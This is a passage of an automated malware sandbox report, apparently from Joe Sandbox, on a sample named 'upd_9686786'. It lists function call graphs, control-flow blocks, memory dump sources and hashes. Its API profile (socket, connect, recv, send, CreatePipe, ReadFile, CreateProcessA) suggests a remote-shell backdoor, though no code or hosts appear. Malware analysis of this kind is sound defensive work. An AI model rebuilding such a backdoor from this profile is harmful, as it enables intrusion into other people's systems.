                                                                                                                    callgraph 0 Function_00007FF76E65568B 60 Function_00007FF76E655848 0->60 1 Function_00007FF76E656C0C 2 Function_00007FF76E65470E 3 Function_00007FF76E652288 62 Function_00007FF76E652453 3->62 4 Function_00007FF76E651389 5 Function_00007FF76E65450A 5->0 11 Function_00007FF76E65407C 5->11 64 Function_00007FF76E653D54 5->64 6 Function_00007FF76E653993 7 Function_00007FF76E652514 75 Function_00007FF76E652A43 7->75 83 Function_00007FF76E652734 7->83 8 Function_00007FF76E651896 18 Function_00007FF76E655303 8->18 21 Function_00007FF76E651A86 8->21 34 Function_00007FF76E6561F3 8->34 35 Function_00007FF76E6548F3 8->35 79 Function_00007FF76E6550AD 8->79 9 Function_00007FF76E654196 9->11 9->64 10 Function_00007FF76E652D91 12 Function_00007FF76E656DFC 13 Function_00007FF76E655D77 14 Function_00007FF76E656978 15 Function_00007FF76E655279 16 Function_00007FF76E6537FA 16->6 17 Function_00007FF76E652C03 17->10 86 Function_00007FF76E655430 18->86 19 Function_00007FF76E651303 20 Function_00007FF76E651805 22 Function_00007FF76E651000 23 Function_00007FF76E656481 25 Function_00007FF76E65656B 23->25 24 Function_00007FF76E6531EB 91 Function_00007FF76E653298 24->91 39 Function_00007FF76E6565F5 25->39 26 Function_00007FF76E652FEC 54 Function_00007FF76E65455F 26->54 27 Function_00007FF76E651D6D 28 Function_00007FF76E651567 32 Function_00007FF76E652E6A 28->32 28->35 29 Function_00007FF76E655169 30 Function_00007FF76E6560E9 31 Function_00007FF76E653B6A 31->11 31->64 33 Function_00007FF76E6555EA 36 Function_00007FF76E6566F3 37 Function_00007FF76E6520F4 38 Function_00007FF76E655A75 40 Function_00007FF76E656876 40->14 41 Function_00007FF76E6543EF 41->11 41->64 41->79 42 Function_00007FF76E654EF0 88 Function_00007FF76E655BB2 42->88 43 Function_00007FF76E652971 44 Function_00007FF76E6552F1 45 Function_00007FF76E651A5B 46 Function_00007FF76E6530DB 63 Function_00007FF76E655DD3 46->63 
47 Function_00007FF76E65105D 47->4 93 Function_00007FF76E6511A4 47->93 48 Function_00007FF76E6546DD 56 Function_00007FF76E656861 48->56 48->79 49 Function_00007FF76E655EDE 50 Function_00007FF76E654657 51 Function_00007FF76E6523DA 52 Function_00007FF76E655A5A 52->60 53 Function_00007FF76E654C66 53->0 53->11 53->64 54->50 55 Function_00007FF76E6555DF 57 Function_00007FF76E6567CB 58 Function_00007FF76E65254D 58->75 58->83 59 Function_00007FF76E652E4E 59->88 61 Function_00007FF76E652049 61->37 65 Function_00007FF76E655654 66 Function_00007FF76E6516D6 89 Function_00007FF76E654C9D 66->89 67 Function_00007FF76E6537D0 68 Function_00007FF76E6542D2 68->79 69 Function_00007FF76E6562D2 69->23 69->36 70 Function_00007FF76E65603B 71 Function_00007FF76E65283C 72 Function_00007FF76E655F39 72->70 73 Function_00007FF76E6567B9 74 Function_00007FF76E651BBA 74->27 74->61 74->88 90 Function_00007FF76E651F98 74->90 75->17 76 Function_00007FF76E65533F 76->86 77 Function_00007FF76E654A40 78 Function_00007FF76E6567C2 80 Function_00007FF76E653627 81 Function_00007FF76E653428 81->80 84 Function_00007FF76E6550B5 81->84 82 Function_00007FF76E655F29 83->43 84->29 85 Function_00007FF76E651B2F 87 Function_00007FF76E651A32 92 Function_00007FF76E654DA3 94 Function_00007FF76E651020

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleepclosesocketsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1397201513-0
                                                                                                                    • Opcode ID: 94b69f38999c093dae44a1891abfa34e2e9be6bd928ae543be3124dfe944e5d5
                                                                                                                    • Instruction ID: a309666c371db75caf73dfba03dc5efdc085832fbad0e505f32ede5a110a39ae
                                                                                                                    • Opcode Fuzzy Hash: 94b69f38999c093dae44a1891abfa34e2e9be6bd928ae543be3124dfe944e5d5
                                                                                                                    • Instruction Fuzzy Hash: 2BF16F72F08661CEF724DB75D8507ED37B2A744358F4041BADE4DA7B88DA389A81CB24

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 239 7ff76e65568b-7ff76e6556eb recv 241 7ff76e65579f-7ff76e6557a2 239->241 242 7ff76e6556f1-7ff76e65579c call 7ff76e655848 239->242 244 7ff76e6557a4-7ff76e6557d9 241->244 245 7ff76e6557e0-7ff76e65581f 241->245 242->241 244->245 247 7ff76e655845-7ff76e655847 245->247 248 7ff76e655821-7ff76e65583f 245->248 248->247
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: recv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1507349165-0
                                                                                                                    • Opcode ID: 791e244315fc06028d538548ed3a024d295ae4e4d4409c79685b24c86601f63d
                                                                                                                    • Instruction ID: 63c4885219f874aaa626e6e459ea69b5487c917dc34f96266fb3cfdd903f1f39
                                                                                                                    • Opcode Fuzzy Hash: 791e244315fc06028d538548ed3a024d295ae4e4d4409c79685b24c86601f63d
                                                                                                                    • Instruction Fuzzy Hash: F8414D76F04621CEF714DBB5DC50BED37B2A748748F4081AADE4D63B88DA389A858F14

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d678a03ba1620f1f061fb041fd8b27c9f911aca453d9e8745f37b1a9bceb3f4f
                                                                                                                    • Instruction ID: c2a77521ab0c05608d6192b82b2d701c6a0463d4536653f275081b8b81c71f26
                                                                                                                    • Opcode Fuzzy Hash: d678a03ba1620f1f061fb041fd8b27c9f911aca453d9e8745f37b1a9bceb3f4f
                                                                                                                    • Instruction Fuzzy Hash: 6ED15F72F08661CEF724DB75DC407ED77B2A744348F4080B6DE4C67B49DA78AA818B24

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 46 7ff76e654196-7ff76e6541b6 connect 47 7ff76e6541bc-7ff76e65420a 46->47 48 7ff76e653b72-7ff76e653b8a SleepEx 46->48 49 7ff76e65420c-7ff76e654218 47->49 50 7ff76e654242-7ff76e654249 47->50 51 7ff76e653e59-7ff76e653e76 socket 48->51 52 7ff76e653b90 48->52 53 7ff76e65421a-7ff76e65422e 49->53 54 7ff76e654232-7ff76e65423b 49->54 57 7ff76e65424b-7ff76e654251 50->57 58 7ff76e654294-7ff76e6542cc 50->58 55 7ff76e653e7c-7ff76e653ed7 call 7ff76e656e18 51->55 56 7ff76e654f01-7ff76e654f56 call 7ff76e656e40 51->56 59 7ff76e653e3e-7ff76e653e4e closesocket 52->59 60 7ff76e653b96-7ff76e653bca 52->60 53->54 54->50 73 7ff76e653ed9-7ff76e653efa 55->73 74 7ff76e653f00-7ff76e653f16 55->74 71 7ff76e654f58-7ff76e654f95 56->71 72 7ff76e654f99-7ff76e654fab 56->72 63 7ff76e654253-7ff76e65428e 57->63 64 7ff76e654291 57->64 59->51 65 7ff76e653bcc-7ff76e653c2f 60->65 66 7ff76e653c31-7ff76e653c3d 60->66 63->64 64->58 65->66 69 7ff76e653c96-7ff76e653c99 66->69 70 7ff76e653c3f-7ff76e653c92 call 7ff76e653d54 66->70 76 7ff76e653c9b-7ff76e653ca4 69->76 77 7ff76e653ca7-7ff76e653cd1 69->77 70->69 71->72 80 7ff76e654fad-7ff76e654fb9 72->80 81 7ff76e654fbf-7ff76e654fc6 72->81 73->74 88 7ff76e653f37-7ff76e653f9d call 7ff76e65407c 74->88 89 7ff76e653f18-7ff76e653f31 74->89 76->77 78 7ff76e653cfb-7ff76e653d05 77->78 79 7ff76e653cd3-7ff76e653cf4 77->79 84 7ff76e653d07-7ff76e653d0c 78->84 85 7ff76e653d10-7ff76e653d28 78->85 79->78 80->81 86 7ff76e654fc8-7ff76e655010 81->86 87 7ff76e655012-7ff76e65502c 81->87 84->85 90 7ff76e653d2a 85->90 91 7ff76e653d31-7ff76e653d53 85->91 86->87 92 7ff76e65502e-7ff76e65505f 87->92 93 7ff76e655066-7ff76e6550a3 87->93 97 7ff76e653fdc-7ff76e654031 88->97 98 7ff76e653f9f-7ff76e653fd6 88->98 89->88 90->91 92->93 99 7ff76e654033-7ff76e65403a 97->99 100 7ff76e654041-7ff76e65407b 97->100 98->97 99->100 100->56
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleepconnect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 238548546-0
                                                                                                                    • Opcode ID: 5d46df525b8571bf93a1d67ccb85f50759179d789b6d2bd50af01d4b5f6cc54e
                                                                                                                    • Instruction ID: 5ea9f7c253f13ee03abe60561a47a594702880d636919b145183ec9019c2eec1
                                                                                                                    • Opcode Fuzzy Hash: 5d46df525b8571bf93a1d67ccb85f50759179d789b6d2bd50af01d4b5f6cc54e
                                                                                                                    • Instruction Fuzzy Hash: 5B915C72F04610CEF314DFB5D8407AC77B2A744758F5081BADE4D63B98DA38A951CB24

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 101 7ff76e65450a-7ff76e654520 call 7ff76e65568b 104 7ff76e654526-7ff76e65452d 101->104 105 7ff76e653b72-7ff76e653b8a SleepEx 101->105 108 7ff76e654533-7ff76e65455d call 7ff76e65568b 104->108 109 7ff76e654f01-7ff76e654f56 call 7ff76e656e40 104->109 106 7ff76e653e59-7ff76e653e76 socket 105->106 107 7ff76e653b90 105->107 106->109 111 7ff76e653e7c-7ff76e653ed7 call 7ff76e656e18 106->111 112 7ff76e653e3e-7ff76e653e4e closesocket 107->112 113 7ff76e653b96-7ff76e653bca 107->113 108->109 119 7ff76e654f58-7ff76e654f95 109->119 120 7ff76e654f99-7ff76e654fab 109->120 127 7ff76e653ed9-7ff76e653efa 111->127 128 7ff76e653f00-7ff76e653f16 111->128 112->106 116 7ff76e653bcc-7ff76e653c2f 113->116 117 7ff76e653c31-7ff76e653c3d 113->117 116->117 122 7ff76e653c96-7ff76e653c99 117->122 123 7ff76e653c3f-7ff76e653c92 call 7ff76e653d54 117->123 119->120 125 7ff76e654fad-7ff76e654fb9 120->125 126 7ff76e654fbf-7ff76e654fc6 120->126 130 7ff76e653c9b-7ff76e653ca4 122->130 131 7ff76e653ca7-7ff76e653cd1 122->131 123->122 125->126 135 7ff76e654fc8-7ff76e655010 126->135 136 7ff76e655012-7ff76e65502c 126->136 127->128 143 7ff76e653f37-7ff76e653f9d call 7ff76e65407c 128->143 144 7ff76e653f18-7ff76e653f31 128->144 130->131 133 7ff76e653cfb-7ff76e653d05 131->133 134 7ff76e653cd3-7ff76e653cf4 131->134 139 7ff76e653d07-7ff76e653d0c 133->139 140 7ff76e653d10-7ff76e653d28 133->140 134->133 135->136 141 7ff76e65502e-7ff76e65505f 136->141 142 7ff76e655066-7ff76e6550a3 136->142 139->140 145 7ff76e653d2a 140->145 146 7ff76e653d31-7ff76e653d53 140->146 141->142 150 7ff76e653fdc-7ff76e654031 143->150 151 7ff76e653f9f-7ff76e653fd6 143->151 144->143 145->146 152 7ff76e654033-7ff76e65403a 150->152 153 7ff76e654041-7ff76e65407b 150->153 151->150 152->153 153->109
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleeprecv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 711674940-0
                                                                                                                    • Opcode ID: 37cb74850d26e6203b063bc812a73826d3e4cb8ecff5cccc3d81f9dbea852fa0
                                                                                                                    • Instruction ID: 589a441a7ff3a8ec276d4fb13ed68eecbc456f4b5871bb17951f487308b66c94
                                                                                                                    • Opcode Fuzzy Hash: 37cb74850d26e6203b063bc812a73826d3e4cb8ecff5cccc3d81f9dbea852fa0
                                                                                                                    • Instruction Fuzzy Hash: A8B15172F04661CEF724DB75D8407EC33B2A744358F4041BADE4DA7B98DA78AA81CB24

                                                                                                                    Control-flow Graph

                                                                                                                     [Control-flow graph rendering; basic blocks 154-208, entry block at 7ff76e6543ef; API calls in graph: SleepEx, socket, closesocket]
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: e283b88006e450f80ec96e91abc3be5deda5fe8bbd1de692f4baf3d358240bf6
                                                                                                                    • Instruction ID: 0f513793c609334d052083eae4697abc2be256b06ede3d1d340f794bdfa37add
                                                                                                                    • Opcode Fuzzy Hash: e283b88006e450f80ec96e91abc3be5deda5fe8bbd1de692f4baf3d358240bf6
                                                                                                                    • Instruction Fuzzy Hash: 35912A76F04611CEF714DFB5D840BAC73B2A744758F5080BADE4DA7B88DA38A951CB24

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: recv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1507349165-0
                                                                                                                    • Opcode ID: 91d64ca66c471347d8d74566ad20c5159684f8f073e9bc6a12cada6ca3833ba3
                                                                                                                    • Instruction ID: a0d0f8a223d06be53cd143c0d292b3c02668664d31b2ea996084b7a6806d3566
                                                                                                                    • Opcode Fuzzy Hash: 91d64ca66c471347d8d74566ad20c5159684f8f073e9bc6a12cada6ca3833ba3
                                                                                                                    • Instruction Fuzzy Hash: 2D415F76F04621CEF714DBB5DC54BED73B2A744748F4080B6DE4DA3B88DA389A858B24

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreatePipe
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2719314638-0
                                                                                                                    • Opcode ID: 2028910728e95217fe6049109da53333d88b96834b05290c622d7526b96f1247
                                                                                                                    • Instruction ID: 2f3f30b3c961768fc0890cc29d3e0fdde47bea49f0049fca6131cb212f6675b9
                                                                                                                    • Opcode Fuzzy Hash: 2028910728e95217fe6049109da53333d88b96834b05290c622d7526b96f1247
                                                                                                                    • Instruction Fuzzy Hash: FF414F76F04661CEF724DB75DC407EC73B2A745348F4081A6DE0DA7B88CA38AA80CB65

                                                                                                                    Control-flow Graph

                                                                                                                     [Control-flow graph rendering; basic blocks 249-255, entry block at 7ff76e6542d2; API calls in graph: send]
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: send
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2809346765-0
                                                                                                                    • Opcode ID: 361358741b24178b0fa74cdce2c07cab7a2c23279fe57aa56eac6bc2aae8d422
                                                                                                                    • Instruction ID: 6dab408f08ec176c81857fda73cf65f5ff2e58d2435387b9781a889537763fd4
                                                                                                                    • Opcode Fuzzy Hash: 361358741b24178b0fa74cdce2c07cab7a2c23279fe57aa56eac6bc2aae8d422
                                                                                                                    • Instruction Fuzzy Hash: 62314B76F04B11CEF700DBB5E8817AD7772A70874CF90406ACE0C67B98CE78A9518768

                                                                                                                    Control-flow Graph

                                                                                                                     [Control-flow graph rendering; basic blocks 256-261, entry block at 7ff76e6537d0; API calls in graph: ReadFile]
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 00c90bc5f8544e46d9e3aab6e9ad6653e89a0406caa48d4fff5ae3471c0ed56e
                                                                                                                    • Instruction ID: 41e7b61bd8cc3d7e97325da8257dd238acf7ddc9be6c292221554f441d7689d0
                                                                                                                    • Opcode Fuzzy Hash: 00c90bc5f8544e46d9e3aab6e9ad6653e89a0406caa48d4fff5ae3471c0ed56e
                                                                                                                    • Instruction Fuzzy Hash: BB217F76B04A42CEF714CF65DC447A97372E748B98F5081A5DE4DA7B8CDA3899408B28

                                                                                                                    Control-flow Graph

                                                                                                                     [Control-flow graph rendering; single basic block 262 at 7ff76e655d77-7ff76e655dd2; API calls in graph: CreateProcessA]
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 8e1d515f989e4e1815a9006ba4d20c998d1b83e19281eeaa243eb79deec221df
                                                                                                                    • Instruction ID: 23d0a5cc21a98f2970485769ca36005a01e1ac803d62f1b2c0a49c968afb4293
                                                                                                                    • Opcode Fuzzy Hash: 8e1d515f989e4e1815a9006ba4d20c998d1b83e19281eeaa243eb79deec221df
                                                                                                                    • Instruction Fuzzy Hash: 36E0ED72324B5086E7208B00F89474BB7B5F784788F500125EA8D07BA8DF3EC2448B50

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: f37c09c3e7aa3ebea8f22872309fc393a3fbbaf2681fade2672b93c1bf96486d
                                                                                                                    • Instruction ID: abda611bb488f70b94b822e26f05d8e414ea0318aee8a2b3aa85c760167b1884
                                                                                                                    • Opcode Fuzzy Hash: f37c09c3e7aa3ebea8f22872309fc393a3fbbaf2681fade2672b93c1bf96486d
                                                                                                                    • Instruction Fuzzy Hash: 3D514876F04A11CEF714DBB1D854BEC77B2A744748F4080BADE4DA7B88CE38A9518B24
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.30016287081.00007FFC94BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94BC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc94bc0000_powershell.jbxd
Memory Dump Source
• Source File: 00000002.00000002.30017398046.00007FFC94C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffc94c90000_powershell.jbxd
Memory Dump Source
• Source File: 00000002.00000002.30016287081.00007FFC94BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffc94bc0000_powershell.jbxd
Memory Dump Source
• Source File: 00000002.00000002.30016287081.00007FFC94BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffc94bc0000_powershell.jbxd
Memory Dump Source
• Source File: 00000002.00000002.30017398046.00007FFC94C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffc94c90000_powershell.jbxd
Memory Dump Source
• Source File: 00000002.00000002.30017398046.00007FFC94C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffc94c90000_powershell.jbxd
Memory Dump Source
• Source File: 00000002.00000002.30016287081.00007FFC94BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94BC0000, based on PE: false
Joe Sandbox IDA Plugin
